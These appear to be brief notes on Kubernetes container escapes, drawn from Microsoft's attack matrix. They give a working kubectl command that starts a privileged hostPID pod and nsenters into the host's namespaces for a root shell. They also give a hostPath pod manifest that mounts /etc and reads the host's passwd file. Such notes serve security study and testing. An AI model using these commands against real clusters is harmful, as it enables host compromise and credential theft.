A privileged container is a container that has all the capabilities of the host machine, which lifts all the limitations regular containers have. Practically, this means that privileged containers can do almost every action that can be performed directly on the host. Attackers who gain access to a privileged container, or have permissions to create a new privileged container (by using the compromised pod’s service account, for example), can get access to the host’s resources.
cf attack matrics kubernetes by MS
Steps:
- Run the below command on the target cluster
kubectl run scary --restart=Never -t -i \
--image overridden --overrides \
'{
"spec":{
"hostPID": true,
"nodeName": "'$1'",
"containers":[{
"name":"busybox",
"image":"alpine",
"command":[
"nsenter",
"--mount=/proc/1/ns/mnt",
"--","/bin/bash"],
"stdin": true,
"tty":true,
"securityContext":{
"privileged":true
}
}]
}
}' --rm --attach
}
- you can check directory and process and see it's host.
hostPath mount can be used by attackers to get access to the underlying host and thus break from the container to the host. (See “3: Writable hostPath mount” for details).
cf attack matrics kubernetes by MS
Steps:
- create a pod with hostPath mount
apiVersion: v1
kind: Pod
metadata:
name: test-pd
spec:
containers:
- image: gcr.io/google-samples/hello-app:1.0
name: test-container
volumeMounts:
- mountPath: /test-proc
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /etc
type: Directory
$ kubectl apply -f host-path-pod.yaml
- see passwd file via the pod
$ kubectl exec -it test-pd -- cat /test-proc/passwd